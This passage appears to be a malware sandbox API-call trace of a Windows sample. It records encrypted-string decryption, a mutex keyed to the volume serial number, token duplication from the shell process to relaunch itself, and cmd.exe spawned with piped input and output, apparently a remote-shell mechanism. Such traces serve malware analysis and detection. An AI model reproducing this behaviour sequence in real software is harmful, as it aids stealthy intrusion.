(HeapHandle=0x8c0000, Flags=0x0, Size=0x1e) returned 0x8c14d8 [0054.390] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0x8c5480 [0054.390] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xaafd40, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaafda8 | out: phKey=0xaafda8*=0x2ebcb0) returned 1 [0054.390] CryptSetKeyParam (hKey=0x2ebcb0, dwParam=0x1, pbData=0xaafd90, dwFlags=0x0) returned 1 [0054.390] CryptDecrypt (in: hKey=0x2ebcb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c5480, pdwDataLen=0xaafd5c | out: pbData=0x8c5480, pdwDataLen=0xaafd5c) returned 1 [0054.390] CryptDestroyKey (hKey=0x2ebcb0) returned 1 [0054.390] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c5480 | out: hHeap=0x8c0000) returned 1 [0054.391] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x8c1740, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0054.391] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14d8 | out: hHeap=0x8c0000) returned 1 [0054.391] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1718 | out: hHeap=0x8c0000) returned 1 [0054.391] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xaafe10, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xaafe10*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0054.391] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1740 | out: hHeap=0x8c0000) returned 1 [0054.391] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x40) returned 0x8c1718 [0054.391] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xaafd9c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaafe04 | out: phKey=0xaafe04*=0x2ebcb0) returned 1 [0054.391] CryptSetKeyParam (hKey=0x2ebcb0, dwParam=0x1, pbData=0xaafdec, dwFlags=0x0) returned 1 [0054.391] CryptDecrypt (in: hKey=0x2ebcb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1718, pdwDataLen=0xaafdb8 | out: pbData=0x8c1718, pdwDataLen=0xaafdb8) returned 1 [0054.391] CryptDestroyKey (hKey=0x2ebcb0) returned 1 [0054.391] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x34) returned 0x8c14d8 [0054.391] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x118 [0054.391] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0054.391] CloseHandle (hObject=0x118) returned 1 [0054.391] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1718 | out: hHeap=0x8c0000) returned 1 [0054.391] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14d8 | out: hHeap=0x8c0000) returned 1 [0054.391] Sleep (dwMilliseconds=0x3e8) [0057.621] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x20) returned 0x8c1718 [0057.621] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xaafd68, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaafdd0 | out: phKey=0xaafdd0*=0x2ebcb0) returned 1 [0057.621] CryptSetKeyParam (hKey=0x2ebcb0, dwParam=0x1, pbData=0xaafdb8, dwFlags=0x0) returned 1 [0057.621] CryptDecrypt (in: hKey=0x2ebcb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1718, pdwDataLen=0xaafd84 | out: pbData=0x8c1718, pdwDataLen=0xaafd84) returned 1 [0057.621] CryptDestroyKey (hKey=0x2ebcb0) returned 1 [0057.621] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x1e) returned 0x8c1740 [0057.621] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x1e) returned 0x8c14d8 [0057.621] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0x8c5480 [0057.621] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xaafd40, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaafda8 | out: phKey=0xaafda8*=0x2ebcb0) returned 1 [0057.621] CryptSetKeyParam (hKey=0x2ebcb0, dwParam=0x1, pbData=0xaafd90, dwFlags=0x0) returned 1 [0057.621] CryptDecrypt (in: hKey=0x2ebcb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c5480, pdwDataLen=0xaafd5c | out: pbData=0x8c5480, pdwDataLen=0xaafd5c) returned 1 [0057.621] CryptDestroyKey (hKey=0x2ebcb0) returned 1 [0057.621] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c5480 | out: hHeap=0x8c0000) returned 1 [0057.621] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x8c1740, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0057.621] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14d8 | out: hHeap=0x8c0000) returned 1 [0057.621] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1718 | out: hHeap=0x8c0000) returned 1 [0057.621] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xaafe10, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xaafe10*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0057.622] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1740 | out: hHeap=0x8c0000) returned 1 [0057.622] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x40) returned 0x8c1718 [0057.622] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xaafd9c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaafe04 | out: phKey=0xaafe04*=0x2ebcb0) returned 1 [0057.622] CryptSetKeyParam (hKey=0x2ebcb0, dwParam=0x1, pbData=0xaafdec, dwFlags=0x0) returned 1 [0057.622] CryptDecrypt (in: hKey=0x2ebcb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1718, pdwDataLen=0xaafdb8 | out: pbData=0x8c1718, pdwDataLen=0xaafdb8) returned 1 [0057.622] CryptDestroyKey (hKey=0x2ebcb0) returned 1 [0057.622] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x34) returned 0x8c14d8 [0057.622] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x118 [0057.622] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0057.622] CloseHandle (hObject=0x118) returned 1 [0057.622] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1718 | out: hHeap=0x8c0000) returned 1 [0057.622] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14d8 | out: hHeap=0x8c0000) returned 1 [0057.622] Sleep (dwMilliseconds=0x3e8) [0063.792] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x20) returned 0x8c1718 [0063.792] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xaafd68, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaafdd0 | out: phKey=0xaafdd0*=0x2ebcb0) returned 1 [0063.792] CryptSetKeyParam (hKey=0x2ebcb0, dwParam=0x1, pbData=0xaafdb8, dwFlags=0x0) returned 1 [0063.792] CryptDecrypt (in: hKey=0x2ebcb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1718, pdwDataLen=0xaafd84 | out: pbData=0x8c1718, pdwDataLen=0xaafd84) returned 1 [0063.792] CryptDestroyKey (hKey=0x2ebcb0) returned 1 [0063.792] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x1e) returned 0x8c1740 [0063.792] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x1e) returned 0x8c14d8 [0063.792] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0x8c5480 [0063.792] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xaafd40, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaafda8 | out: phKey=0xaafda8*=0x2ebcb0) returned 1 [0063.793] CryptSetKeyParam (hKey=0x2ebcb0, dwParam=0x1, pbData=0xaafd90, dwFlags=0x0) returned 1 [0063.793] CryptDecrypt (in: hKey=0x2ebcb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c5480, pdwDataLen=0xaafd5c | out: pbData=0x8c5480, pdwDataLen=0xaafd5c) returned 1 [0063.793] CryptDestroyKey (hKey=0x2ebcb0) returned 1 [0063.793] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c5480 | out: hHeap=0x8c0000) returned 1 [0063.793] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x8c1740, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0063.793] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14d8 | out: hHeap=0x8c0000) returned 1 [0063.793] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1718 | out: hHeap=0x8c0000) returned 1 [0063.793] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xaafe10, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xaafe10*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0063.793] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1740 | out: hHeap=0x8c0000) returned 1 [0063.793] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x40) returned 0x8c1718 [0063.793] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xaafd9c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaafe04 | out: phKey=0xaafe04*=0x2ebcb0) returned 1 [0063.793] CryptSetKeyParam (hKey=0x2ebcb0, dwParam=0x1, pbData=0xaafdec, dwFlags=0x0) returned 1 [0063.793] CryptDecrypt (in: hKey=0x2ebcb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1718, pdwDataLen=0xaafdb8 | out: pbData=0x8c1718, pdwDataLen=0xaafdb8) returned 1 [0063.793] CryptDestroyKey (hKey=0x2ebcb0) returned 1 [0063.793] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x34) returned 0x8c14d8 [0063.793] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x118 [0063.793] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0063.793] CloseHandle (hObject=0x118) returned 1 [0063.793] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1718 | out: hHeap=0x8c0000) returned 1 [0063.794] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14d8 | out: hHeap=0x8c0000) returned 1 [0063.794] Sleep (dwMilliseconds=0x3e8) [0065.418] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x20) returned 0x8c1698 [0065.418] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xaafd68, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaafdd0 | out: phKey=0xaafdd0*=0x2f3170) returned 1 [0065.418] CryptSetKeyParam (hKey=0x2f3170, dwParam=0x1, pbData=0xaafdb8, dwFlags=0x0) returned 1 [0065.418] CryptDecrypt (in: hKey=0x2f3170, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1698, pdwDataLen=0xaafd84 | out: pbData=0x8c1698, pdwDataLen=0xaafd84) returned 1 [0065.418] CryptDestroyKey (hKey=0x2f3170) returned 1 [0065.418] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x1e) returned 0x8c15c8 [0065.418] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x1e) returned 0x8c54a0 [0065.418] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0x8c54c8 [0065.418] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xaafd40, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaafda8 | out: phKey=0xaafda8*=0x2f3170) returned 1 [0065.419] CryptSetKeyParam (hKey=0x2f3170, dwParam=0x1, pbData=0xaafd90, dwFlags=0x0) returned 1 [0065.419] CryptDecrypt (in: hKey=0x2f3170, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c54c8, pdwDataLen=0xaafd5c | out: pbData=0x8c54c8, pdwDataLen=0xaafd5c) returned 1 [0065.419] CryptDestroyKey (hKey=0x2f3170) returned 1 [0065.419] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c54c8 | out: hHeap=0x8c0000) returned 1 [0065.419] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x8c15c8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0065.419] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c54a0 | out: hHeap=0x8c0000) returned 1 [0065.419] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1698 | out: hHeap=0x8c0000) returned 1 [0065.419] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xaafe10, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xaafe10*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0065.419] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c15c8 | out: hHeap=0x8c0000) returned 1 [0065.419] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x40) returned 0x8c54a0 [0065.419] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xaafd9c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaafe04 | out: phKey=0xaafe04*=0x2f3170) returned 1 [0065.419] CryptSetKeyParam (hKey=0x2f3170, dwParam=0x1, pbData=0xaafdec, dwFlags=0x0) returned 1 [0065.419] CryptDecrypt (in: hKey=0x2f3170, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c54a0, pdwDataLen=0xaafdb8 | out: pbData=0x8c54a0, pdwDataLen=0xaafdb8) returned 1 [0065.419] CryptDestroyKey (hKey=0x2f3170) returned 1 [0065.419] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x34) returned 0x8c54e8 [0065.419] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0xa0 [0065.419] WaitForSingleObject (hHandle=0xa0, dwMilliseconds=0x0) returned 0x80 [0065.419] CloseHandle (hObject=0xa0) returned 1 [0065.419] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c54a0 | out: hHeap=0x8c0000) returned 1 [0065.419] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c54e8 | out: hHeap=0x8c0000) returned 1 [0065.420] Sleep (dwMilliseconds=0x3e8) Thread: id = 3 os_tid = 0x980 [0038.624] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x20a) returned 0x8c1470 [0038.624] GetVersion () returned 0x1db10106 [0038.624] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x50) returned 0x8c1688 [0038.624] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xbefab8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xbefb20 | out: phKey=0xbefb20*=0x2e4ba8) returned 1 [0038.624] CryptSetKeyParam (hKey=0x2e4ba8, dwParam=0x1, pbData=0xbefb08, dwFlags=0x0) returned 1 [0038.624] CryptDecrypt (in: hKey=0x2e4ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1688, pdwDataLen=0xbefad4 | out: pbData=0x8c1688, pdwDataLen=0xbefad4) returned 1 [0038.624] CryptDestroyKey (hKey=0x2e4ba8) returned 1 [0038.624] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0038.624] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0038.624] Wow64DisableWow64FsRedirection (in: OldValue=0xbefbbc | out: OldValue=0xbefbbc*=0x0) returned 1 [0038.625] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1688 | out: hHeap=0x8c0000) returned 1 [0038.625] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x74d40000 [0038.625] GetProcAddress (hModule=0x74d40000, lpProcName="CreateProcessWithTokenW") returned 0x74d8531f [0038.625] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x8c1470, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\exec.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\exec.exe")) returned 0x2e [0038.625] GetShellWindow () returned 0x100f2 [0038.626] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0xbefbc4 | out: lpdwProcessId=0xbefbc4) returned 0x460 [0038.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x45c) returned 0x98 [0038.626] OpenProcessToken (in: ProcessHandle=0x98, DesiredAccess=0x2000000, TokenHandle=0xbefbd0 | out: TokenHandle=0xbefbd0*=0x9c) returned 1 [0038.626] DuplicateTokenEx (in: hExistingToken=0x9c, dwDesiredAccess=0x2000000, lpTokenAttributes=0xbefbb0, ImpersonationLevel=0x2, TokenType=0x1, phNewToken=0xbefbcc | out: phNewToken=0xbefbcc*=0xa0) returned 1 [0038.626] CreateProcessWithTokenW (in: hToken=0xa0, dwLogonFlags=0x0, lpApplicationName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\exec.exe", lpCommandLine=0x0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0xbefb5c*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xbefba0 | out: lpCommandLine=0x0, lpProcessInformation=0xbefba0*(hProcess=0xec, hThread=0xf0, dwProcessId=0x98c, dwThreadId=0x990)) returned 1 [0038.782] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x50) returned 0x8c1688 [0038.782] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xbefab8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xbefb20 | out: phKey=0xbefb20*=0x2e7ff8) returned 1 [0038.782] CryptSetKeyParam (hKey=0x2e7ff8, dwParam=0x1, pbData=0xbefb08, dwFlags=0x0) returned 1 [0038.783] CryptDecrypt (in: hKey=0x2e7ff8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1688, pdwDataLen=0xbefad4 | out: pbData=0x8c1688, pdwDataLen=0xbefad4) returned 1 [0038.783] CryptDestroyKey (hKey=0x2e7ff8) returned 1 [0038.783] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0038.783] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x76c4d668 [0038.783] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0038.783] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1688 | out: hHeap=0x8c0000) returned 1 [0038.783] CloseHandle (hObject=0x98) returned 1 [0038.783] CloseHandle (hObject=0xec) returned 1 [0038.783] CloseHandle (hObject=0xf0) returned 1 [0038.783] CloseHandle (hObject=0x9c) returned 1 [0038.783] CloseHandle (hObject=0xa0) returned 1 [0038.783] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1470 | out: hHeap=0x8c0000) returned 1 Thread: id = 4 os_tid = 0x984 Thread: id = 11 os_tid = 0x9b0 [0044.976] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x20) returned 0x8c14d8 [0044.976] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xfbf98c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xfbf9f4 | out: phKey=0xfbf9f4*=0x2e86f0) returned 1 [0044.976] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0xfbf9dc, dwFlags=0x0) returned 1 [0044.976] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c14d8, pdwDataLen=0xfbf9a8 | out: pbData=0x8c14d8, pdwDataLen=0xfbf9a8) returned 1 [0044.976] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0044.976] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x14) returned 0x8c1500 [0044.977] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x14) returned 0x8c1668 [0044.977] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0x8c1688 [0044.977] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xfbf964, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xfbf9cc | out: phKey=0xfbf9cc*=0x2e86f0) returned 1 [0044.977] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0xfbf9b4, dwFlags=0x0) returned 1 [0044.977] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1688, pdwDataLen=0xfbf980 | out: pbData=0x8c1688, pdwDataLen=0xfbf980) returned 1 [0044.977] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0044.977] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1688 | out: hHeap=0x8c0000) returned 1 [0044.977] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x8c1500, nSize=0xa | out: lpDst="") returned 0x1c [0044.977] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1668 | out: hHeap=0x8c0000) returned 1 [0044.977] RtlReAllocateHeap (Heap=0x8c0000, Flags=0x0, Ptr=0x8c1500, Size=0x26) returned 0x8c1500 [0044.977] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x26) returned 0x8c1668 [0044.977] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0x8c1698 [0044.977] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xfbf960, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xfbf9c8 | out: phKey=0xfbf9c8*=0x2e86f0) returned 1 [0044.977] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0xfbf9b0, dwFlags=0x0) returned 1 [0044.977] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1698, pdwDataLen=0xfbf97c | out: pbData=0x8c1698, pdwDataLen=0xfbf97c) returned 1 [0044.977] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0044.977] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1698 | out: hHeap=0x8c0000) returned 1 [0044.977] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x8c1500, nSize=0x13 | out: lpDst="") returned 0x1c [0044.977] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1668 | out: hHeap=0x8c0000) returned 1 [0044.977] RtlReAllocateHeap (Heap=0x8c0000, Flags=0x0, Ptr=0x8c1500, Size=0x4a) returned 0x8c1668 [0044.977] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x4a) returned 0x8c16c0 [0044.977] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0x8c5480 [0044.977] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xfbf960, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xfbf9c8 | out: phKey=0xfbf9c8*=0x2e86f0) returned 1 [0044.977] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0xfbf9b0, dwFlags=0x0) returned 1 [0044.977] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c5480, pdwDataLen=0xfbf97c | out: pbData=0x8c5480, pdwDataLen=0xfbf97c) returned 1 [0044.977] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0044.977] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c5480 | out: hHeap=0x8c0000) returned 1 [0044.977] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x8c1668, nSize=0x25 | out: lpDst="C:\\Windows\\system32\\cmd.exe") returned 0x1c [0044.977] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c16c0 | out: hHeap=0x8c0000) returned 1 [0044.977] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14d8 | out: hHeap=0x8c0000) returned 1 [0044.977] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x50) returned 0x8c14d8 [0044.977] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xfbf984, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xfbf9ec | out: phKey=0xfbf9ec*=0x2e86f0) returned 1 [0044.977] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0xfbf9d4, dwFlags=0x0) returned 1 [0044.977] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c14d8, pdwDataLen=0xfbf9a0 | out: pbData=0x8c14d8, pdwDataLen=0xfbf9a0) returned 1 [0044.978] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0044.978] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0044.978] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0044.978] Wow64DisableWow64FsRedirection (in: OldValue=0xfbfaa4 | out: OldValue=0xfbfaa4*=0x0) returned 1 [0044.978] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14d8 | out: hHeap=0x8c0000) returned 1 [0044.978] CreatePipe (in: hReadPipe=0xfbfab0, hWritePipe=0xfbfab4, lpPipeAttributes=0xfbfa8c, nSize=0x0 | out: hReadPipe=0xfbfab0*=0xa0, hWritePipe=0xfbfab4*=0x9c) returned 1 [0044.978] CreatePipe (in: hReadPipe=0xfbfaac, hWritePipe=0xfbfaa8, lpPipeAttributes=0xfbfa8c, nSize=0x0 | out: hReadPipe=0xfbfaac*=0xf0, hWritePipe=0xfbfaa8*=0xec) returned 1 [0044.979] SetHandleInformation (hObject=0x9c, dwMask=0x1, dwFlags=0x0) returned 1 [0044.979] SetHandleInformation (hObject=0xf0, dwMask=0x1, dwFlags=0x0) returned 1 [0044.979] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0xfbfa38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xa0, hStdOutput=0xec, hStdError=0xec), lpProcessInformation=0xfbfa7c | out: lpCommandLine=0x0, lpProcessInformation=0xfbfa7c*(hProcess=0x108, hThread=0x10c, dwProcessId=0x9c0, dwThreadId=0x9c4)) returned 1 [0045.018] 